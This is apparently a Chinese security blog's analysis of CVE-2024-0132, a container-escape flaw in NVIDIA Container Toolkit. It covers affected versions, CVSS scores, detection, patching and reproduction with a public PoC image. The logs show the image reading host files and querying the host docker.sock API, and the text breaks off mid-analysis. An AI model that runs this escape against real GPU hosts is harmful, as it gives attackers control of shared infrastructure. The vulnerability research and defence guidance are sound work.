首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析
首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析
原创 ssst0n3 石头的安全料理屋 2025-02-13 13:00
一、基本信息
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
二、组件简介
漏洞产生于 nvidia-container-cli 的库 libnvidia-container.so 中,他们都属于 libnvidia-container。 libnvidia-container和其他相关工具组成了 NVIDIA Container Toolkit。
NVIDIA Container Toolkit是由NVIDIA公司推出的一套工具,用于在容器化环境中实现GPU加速计算。它允许用户在Docker等容器平台中使用NVIDIA GPU,从而在容器中运行需要GPU支持的应用程序,如深度学习训练、推理、科学计算等。
– libnvidia-container:提供了与容器运行时集成的底层库,负责管理GPU设备的挂载、驱动程序和CUDA库。
-
nvidia-container-runtime:这是一个容器运行时,扩展了标准的OCI(Open Container Initiative)运行时,使其支持GPU加速功能。
-
nvidia-docker2(已弃用):早期用于在Docker容器中使用NVIDIA GPU的插件,现在已被NVIDIA Container Toolkit取代。
三、漏洞作者
1. discoverer
1.1 Shir Tamari
Shir Tamari 是一位经验丰富的安全和技术研究员,专注于漏洞研究和实际黑客技术。他出身于 Israel Defense Forces, 目前,是云安全公司 Wiz 的研究主管。过去,他曾在研究、开发和产品领域为多家安全公司担任顾问。他挖掘了多个云安全领域知名漏洞,是 nvidia-container-toolkit 容器逃逸漏洞 CVE-2024-0132 的作者之一。
1.2 Ronen Shustin(ID: Ronen)
Ronen Shustin 是一位经验丰富的漏洞研究员,专注于云安全领域,曾在包括 Wiz、Check Point、以色列 8200 部队等知名组织任职。Ronen 在多个云平台上发现并报告了重要的安全漏洞,如 libnvidia-container CVE-2024-0132 容器逃逸漏洞、Azure PostgreSQL 数据库、GCP Cloud SQL 以及 IBM Cloud Databases for PostgreSQL 等。他在多个安全会议上发表了关于云安全和 Kubernetes 集群安全的演讲,并多次登上微软安全响应中心的安全研究员排行榜。
1.3 Andres Riancho(ID: andresriancho)
Andrés Riancho 是一位专注于攻击性应用安全和培训开发者编写安全代码的专家。他曾在Rapid7担任Web安全总监,领导团队改进了NeXpose的Web应用扫描器。他是开源Web应用安全扫描器w3af的创建者,该工具帮助用户识别和利用Web应用中的漏洞。他还为MercadoLibre和Despegar等拉美独角兽公司提供专业的安全咨询服务。安德烈斯热衷于在全球的安全和开发者大会上演讲,分享他在Web应用安全、漏洞利用和云安全等领域的丰富经验。他目前居住在阿根廷布宜诺斯艾利斯,并在全球范围内提供专业服务。
2. introducer: Jonathan Calmels(ID: 3XX0)
|
|
|
|
---|---|---|---|
|
|
|
|
Jonathan Calmels 是 NVIDIA 的系统软件工程师。他的工作主要侧重于 GPU 数据中心软件和深度学习的超大规模解决方案。
3. fixer: Evan Lezar(ID: elezar)
|
|
|
|
---|---|---|---|
|
|
|
|
Evan Lezar 是一位经验丰富的软件工程师,具有商业和学术背景。他在多种编程语言、角色和团队配置方面拥有超过十年的工作经验。Evan 就职于 NVIDIA。他在计算电磁学领域尤其擅长使用 NVIDIA CUDA 进行 GPU 加速,已发表多篇相关论文,并参与多个国际会议。此外,Evan 还积极参与开源项目,贡献于多个与 NVIDIA GPU 管理、Kubernetes 和容器技术相关的项目。他的研究成果不仅推动了学术界的发展,也在工业界得到了广泛应用。
四、漏洞详情
1. 介绍
1.1 相关特性介绍:CUDA 前向兼容
libnvidia-container支持 CUDA前向兼容(CUDA Forward Compatibility),它允许容器在主机驱动程序版本较旧的情况下,使用比主机驱动程序更新的CUDA库,从而使容器化的CUDA应用程序能够运行在更新的CUDA版本上, 而无需更新主机上的NVIDIA驱动。这对需要使用新特性或新版本CUDA的容器化应用程序而言非常有用,同时保持了与主机系统的兼容性和稳定性。
具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat
目录下较新的CUDA库,挂载到容器 lib 目录。
1.2 漏洞介绍
NVIDIA Container Toolkit 的库 libnvidia-container 在处理CUDA 前向兼容特性时,会把容器/usr/local/cuda/compat
目录下的文件挂载到容器 lib(/usr/lib/x86_64-linux-gnu/等) 目录,挂载行为受到软链接攻击影响,可导致任意主机目录被以只读模式挂载到容器内,进而可导致容器逃逸。
2. 影响
2.1 范围
libnvidia-container >= 1.0.0, <= 1.16.1
详细测量结果参见: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
nvidia-container-toolkit, gpu-operator 因为依赖libnvidia-container而受影响;
nvidia-container-toolkit 支持3种模式:
– legacy: 默认配置,受影响。
-
cdi: 可以手动设置,不受影响。
-
csv: 可以手动设置,不受影响。(此模式主要针对没有 NVML 可用的基于 Tegra 的系统, 官方未提供详细的使用教程,预计使用该模式的用户极少;使用csv模式需要用户手动设置要挂载的文件、设备,不涉及相关特性。)
2.2 危害
可导致任意主机目录被以只读模式挂载到容器内,通过 docker.sock 等文件可调用容器API实现容器逃逸。
2.2.1 CVSS3.1 8.6 (by ssst0n3)
8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.2.2 CVSS3.1 9.0 (by NVIDIA)
9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
|
|
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.2.3 CVSS3.1 8.3 (by NIST:NVD)
8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.3 利用场景
影响允许用户运行任意镜像并在容器内使用NVIDIA GPU的服务。
五、防御
1. 漏洞存在性检测
可通过以下命令确认是否使用受影响版本。
(1) 查看 /etc/docker/daemon.json
或 /etc/containerd/config.toml
文件中是否包含 nvidia 字段。
以下示例说明,有使用NVIDIA Container Toolkit
root@localhost:~# cat /etc/docker/daemon.json |grep nvidia "nvidia": { "path": "nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml |grep nvidia "/usr/bin/nvidia-container-runtime"
(2) 执行相关命令 nvidia-container-runtime –version
等。
以下示例说明,使用的版本为 1.16.2, 不受此漏洞影响。
root@localhost:~# nvidia-container-runtime --versionNVIDIA Container Runtime version 1.16.2commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652spec: 1.2.0runc version 1.1.12-0ubuntu2~22.04.1spec: 1.0.2-devgo: go1.21.1libseccomp: 2.5.3
2. 修复建议
英伟达已发布修复版本,升级至 v1.16.2 及以上版本可以修复。
可参考官方安装指导:https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
3. 规避措施
-
避免执行不可信的镜像
-
或使用CDI方式使用gpu, 详见官方文档: (https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html)
4. 漏洞利用检测
(1) 漏洞利用时会执行 mount 系统调用,可以通过该系统调用的参数检测。 (2) 也可以检测容器进程对主机文件的访问。
六、漏洞复现
1. nvidia-container-toolkit
-
复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
-
复现步骤:
-
运行PoC镜像
-
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
更多版本的影响情况测量,详见 https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
1.1 复现环境
购买华为云香港节点弹性云服务器,我购买的具体配置如下
– 计费模式:按需计费
-
区域/可用区:中国-香港 | 随机分配
-
实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
-
操作系统镜像:Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3root@wanglei-gpu3:~# nvidia-smi Tue Oct 15 11:13:33 2024 +-----------------------------------------------------------------------------+| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 ||-------------------------------+----------------------+----------------------+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC || Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. || | | MIG M. ||===============================+======================+======================|| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 || N/A 30C P8 9W / 70W | 0MiB / 15109MiB | 0% Default || | | N/A |+-------------------------------+----------------------+----------------------+ +-----------------------------------------------------------------------------+| Processes: || GPU GI CI PID Type Process name GPU Memory || ID ID Usage ||=============================================================================|| No running processes found |+-----------------------------------------------------------------------------+
下面开始安装docker和nvidia-container-toolkit
root@wanglei-gpu3:~# apt update && apt install docker.io -yroot@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \ && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \ sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \ tee /etc/apt/sources.list.d/nvidia-container-toolkit.listroot@wanglei-gpu3:~# apt-get update && \ apt-get install -y libnvidia-container1=1.16.1-1 \ libnvidia-container-tools=1.16.1-1 \ nvidia-container-toolkit-base=1.16.1-1 \ nvidia-container-toolkit=1.16.1-1
配置容器运行时 nvidia
root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=dockerWARN[0000] Ignoring runtime-config-override flag for docker INFO[0000] Config file does not exist; using empty config INFO[0000] Wrote updated config to /etc/docker/daemon.json INFO[0000] It is recommended that docker daemon be restarted.root@wanglei-gpu3:~# systemctl restart docker
环境信息如下
root@wanglei-gpu3:~# nvidia-container-cli --versioncli-version: 1.16.1lib-version: 1.16.1build date: 2024-07-23T14:57+00:00build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73dbuild compiler: x86_64-linux-gnu-gcc-7 7.5.0build platform: x86_64build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sectionsroot@wanglei-gpu3:~# root@wanglei-gpu3:~# nvidia-container-cli infoNVRM version: 470.223.02CUDA version: 11.4Device Index: 0Device Minor: 0Model: Tesla T4Brand: NvidiaGPU UUID: GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4bBus Location: 00000000:00:0d.0Architecture: 7.5root@wanglei-gpu3:~# root@wanglei-gpu3:~# docker infoClient: Version: 24.0.7 Context: default Debug Mode: falseServer: Containers: 0 Running: 0 Paused: 0 Stopped: 0 Images: 0 Server Version: 24.0.7 Storage Driver: overlay2 Backing Filesystem: extfs Supports d_type: true Using metacopy: false Native Overlay Diff: true userxattr: false Logging Driver: json-file Cgroup Driver: systemd Cgroup Version: 2 Plugins: Volume: local Network: bridge host ipvlan macvlan null overlay Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog Swarm: inactive Runtimes: io.containerd.runc.v2 nvidia runc Default Runtime: runc Init Binary: docker-init containerd version: runc version: init version: Security Options: apparmor seccomp Profile: builtin cgroupns Kernel Version: 5.15.0-76-generic Operating System: Ubuntu 22.04.2 LTS OSType: linux Architecture: x86_64 CPUs: 8 Total Memory: 31.15GiB Name: wanglei-gpu3 ID: bc9d2464-60ee-458d-93a0-fab77847a4b3 Docker Root Dir: /var/lib/docker Debug Mode: false Experimental: false Insecure Registries: 127.0.0.0/8 Live Restore Enabled: false
1.2 漏洞复现
使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 , 或临时构建。
root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.gitroot@wanglei-gpu3:~# cd poc-cve-2024-0132root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 ....root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132+ cat /host/etc/hostnamewanglei-gpu3+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
2. gpu-operator
-
复现环境: 华为云香港CCE Standard(k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1
-
复现步骤:
-
运行PoC镜像
-
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
测试gpu-operator的目的是证明,其受影响情况原因是其安装的 nvidia-container-toolkit, 故而未测量其他版本。
2.1 复现环境
购买华为云香港节点CCE集群,我购买的具体配置如下
– 计费模式:按需计费
-
集群版本:v1.30
-
添加节点:
-
计费模式:按需计费
-
区域/可用区:中国-香港 | 随机分配
-
实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
-
镜像:Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci |grep NVIDIA00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
下面开始安装 gpu-operator
$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:$ ssh wanglei-k8s-gpu-02862root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.shDownloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gzVerifying checksum... Done.Preparing to install helm into /usr/local/binhelm installed into /usr/local/bin/helmroot@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo updateWARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/configWARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config"nvidia" has been added to your repositoriesWARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/configWARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/configHang tight while we grab the latest from your chart repositories......Successfully got an update from the "nvidia" chart repositoryUpdate Complete. ⎈Happy Helming!⎈root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/configWARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/configNAME: gpu-operator-1733143549LAST DEPLOYED: Mon Dec 2 20:45:52 2024NAMESPACE: gpu-operatorSTATUS: deployedREVISION: 1TEST SUITE: None
遇到 Init:CrashLoopBackOff
错误,不清楚原因。删除pod等待重建即可。
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operatorNAME READY STATUS RESTARTS AGEgpu-feature-discovery-nmz44 0/1 Init:0/1 0 4m42sgpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 6m3sgpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 6m3sgpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 6m3sgpu-operator-77fdfcd757-4gxq4 1/1 Running 0 6m3snvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 4m42snvidia-dcgm-exporter-9d8bp 0/1 Init:0/1 0 4m42snvidia-device-plugin-daemonset-dz84j 0/1 Init:0/1 0 4m42snvidia-driver-daemonset-w2xmw 1/1 Running 0 5m33snvidia-operator-validator-kjc2x 0/1 Init:CrashLoopBackOff 3 (23s ago) 4m42sroot@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2xroot@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operatorNAME READY STATUS RESTARTS AGEgpu-feature-discovery-nmz44 1/1 Running 0 8m7sgpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 9m28sgpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 9m28sgpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 9m28sgpu-operator-77fdfcd757-4gxq4 1/1 Running 0 9m28snvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 8m7snvidia-cuda-validator-895qp 0/1 Completed 0 2m15snvidia-dcgm-exporter-9d8bp 1/1 Running 0 8m7snvidia-device-plugin-daemonset-2s7z2 1/1 Running 0 22snvidia-driver-daemonset-w2xmw 1/1 Running 0 8m58snvidia-operator-validator-gd74c 1/1 Running 0 2m17s
环境信息如下
root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smikubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.Mon Dec 2 12:57:22 2024 +-----------------------------------------------------------------------------------------+| NVIDIA-SMI 550.90.07 Driver Version: 550.90.07 CUDA Version: 12.4 ||-----------------------------------------+------------------------+----------------------+| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC || Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. || | | MIG M. ||=========================================+========================+======================|| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 || N/A 28C P8 9W / 70W | 1MiB / 15360MiB | 0% Default || | | N/A |+-----------------------------------------+------------------------+----------------------+ +-----------------------------------------------------------------------------------------+| Processes: || GPU GI CI PID Type Process name GPU Memory || ID ID Usage ||=========================================================================================|| No running processes found |+-----------------------------------------------------------------------------------------+
2.2 漏洞复现
root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml apiVersion: v1kind: Podmetadata: name: poc-cve-2024-0132spec: restartPolicy: OnFailure containers: - name: poc-cve-2024-0132 image: "docker.io/ssst0n3/poc-cve-2024-0132:latest" imagePullPolicy: IfNotPresent resources: limits: nvidia.com/gpu: 1root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml pod/poc-cve-2024-0132 createdroot@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132+ cat /host/etc/hostnamewanglei-k8s-gpu-02862+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed100 77281 0 77281 0 0 12.6M 0 --:--:-- --:--:-- --:--:-- 14.7M[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315...
3. nvidia-container-toolkit(CDI模式): 不受影响
-
复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
-
复现步骤:
-
运行PoC镜像
-
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
3.1 复现环境
环境同 1.1 节。
按照1.1节:
– 安装docker和nvidia-container-toolkit
- 配置容器运行时
$ apt update && apt install docker.io -y$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \ && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \ sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \ tee /etc/apt/sources.list.d/nvidia-container-toolkit.list$ apt-get update && \ apt-get install -y libnvidia-container1=1.16.1-1 \ libnvidia-container-tools=1.16.1-1 \ nvidia-container-toolkit-base=1.16.1-1 \ nvidia-container-toolkit=1.16.1-1$ nvidia-ctk runtime configure --runtime=docker$ systemctl restart docker
安装完毕后设置CDI模式
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
3.2 漏洞复现: 无法利用
root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest+ cat /host/etc/hostnamecat: /host/etc/hostname: Not a directory+ curl --unix-socket /host-run/docker.sock http://localhost/containers/jsoncurl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server
七、漏洞分析
1. 原始特性分析
1.1 在容器中使用 nvidia gpu
可参考官方文档安装、使用nvidia gpu容器。nvidia-container-toolkit 借助 runc hook 在容器启动前,挂载相关必要驱动。
– https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
- https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi+-----------------------------------------------------------------------------+| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 ||-------------------------------+----------------------+----------------------+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC || Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. || | | MIG M. ||===============================+======================+======================|| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 || N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default || | | N/A |+-------------------------------+----------------------+----------------------+ +-----------------------------------------------------------------------------+| Processes: || GPU GI CI PID Type Process name GPU Memory || ID ID Usage ||=============================================================================|| No running processes found |+-----------------------------------------------------------------------------+
1.2 nvidia-container-toolkit cuda 前向兼容特性
-
向前兼容性(Forward Compatibility)
:在计算机科学和软件工程中,向前兼容性是指一个系统、产品或标准能够与未来的版本协同工作的能力。也就是说,现有的软件或硬件能够在未来更新后,仍然保持功能或兼容性。 -
示例
:一个使用旧版本编译的程序,能够在新版本的环境中运行。 -
向后兼容性(Backward Compatibility)
:是指新版本的系统、产品或标准能够与旧版本的组件协同工作的能力。 -
示例
:一个新版本的软件能够读取旧版本的数据文件。
在 NVIDIA 的官方文档 “CUDA Compatibility Guide”(https://docs.nvidia.com/deploy/cuda-compatibility/index.html) 中,明确提到了 CUDA 的向前兼容性,强调应用程序能够在未来版本的 CUDA 驱动程序和硬件上运行。
★
“Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs.”
NVIDIA 在其文档中还提到,CUDA Runtime 提供了向前兼容性,允许应用程序在使用较新版本驱动程序的系统上运行。
★
“The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers.”
具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat
目录下较新的CUDA库,挂载到容器 lib
目录。
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo |grep compat677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work...$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi============ CUDA ============CUDA Version 12.6.2Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.This container image and its contents are governed by the NVIDIA Deep Learning Container License.By pulling and using the container, you accept the terms and conditions of this license:https://developer.nvidia.com/ngc/nvidia-deep-learning-container-licenseA copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.Tue Nov 26 12:40:00 2024 +-----------------------------------------------------------------------------+| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 12.6 ||-------------------------------+----------------------+----------------------+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC || Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. || | | MIG M. ||===============================+======================+======================|| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 || N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default || | | N/A |+-------------------------------+----------------------+----------------------+ +-----------------------------------------------------------------------------+| Processes: || GPU GI CI PID Type Process name GPU Memory || ID ID Usage ||=============================================================================|| No running processes found |+-----------------------------------------------------------------------------+
1.3 CDI
根据”Support for Container Device Interface — NVIDIA Container Toolkit documentation”(https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):
从 v1.12.0 版本开始,NVIDIA 容器工具包支持生成容器设备接口(CDI)规范。CDI 是一个开放的容器运行时规范,它抽象了对设备(如 NVIDIA GPU)的访问含义,并在各个容器运行时中标准化了访问方式。流行的容器运行时可以读取并处理这一规范,以确保设备在容器中可用。CDI 简化了对 NVIDIA GPU 等设备的支持添加,因为该规范适用于所有支持 CDI 的容器运行时。
通过分析代码确认,CDI 模式通过将挂载配置、设备直接写入到 oci spec, 而不会执行 nvidia-container-cli configure
, 也就不会自行实现挂载了,同时也不支持 cuda 兼容特性。
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml$ docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo |grep overlay643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work
1.4 gpu-operator
参考 “官方文档”(https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html), 安装gpu-operator。
gpu-operator
将通过名为 nvidia-container-toolkit-daemonset
的容器,挂载主机目录,将 nvidia-container-toolkit 安装到主机的 /usr/local/nvidia
目录。
$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzzntName: nvidia-container-toolkit-daemonset-fzzntNamespace: gpu-operatorPriority: 2000001000Priority Class Name: system-node-criticalNode: 10.0.2.70/10.0.2.70Start Time: Thu, 28 Nov 2024 21:00:54 +0800Labels: app=nvidia-container-toolkit-daemonset app.kubernetes.io/managed-by=gpu-operator controller-revision-hash=5798fb59f4 helm.sh/chart=gpu-operator-v24.9.0 pod-template-generation=1Annotations: <none>Status: RunningIP: 172.16.0.146IPs: IP: 172.16.0.146Controlled By: DaemonSet/nvidia-container-toolkit-daemonsetInit Containers: driver-validation: Container ID: containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310 Image: nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0 Image ID: nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5 Port: <none> Host Port: <none> Command: sh -c Args: nvidia-validator State: 